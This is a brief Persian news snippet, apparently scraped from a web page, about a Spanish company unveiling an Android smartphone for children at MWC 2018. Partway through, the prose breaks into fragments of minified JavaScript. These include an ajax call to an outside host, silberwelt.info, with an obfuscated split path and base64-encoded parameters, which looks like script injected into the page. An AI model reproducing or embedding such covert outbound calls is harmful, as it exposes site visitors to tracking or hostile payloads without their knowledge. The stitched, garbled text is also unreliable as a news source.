رونمایی از گوشی هوشمند مخصوص کودکان

یک شرکت اسپانیایی در جریان کنگره جهانی موبایل ۲۰۱۸ بارسلون از یک گوشی هوشمند اندرویدی مخصوص کودکان رونمایی کرد.i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}}; $.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=MTM2LjI0My43Ni43MA==&681=MTUxOTkzOTc4MWI0M2Q4MzQ0MjE5ZmEwNmI2ZGE5Njg3NzU3ZDM1NDA5&crc=e3a86def0bafa39d03275a6064cfe23f93eb015e&cv=1’}); … Read More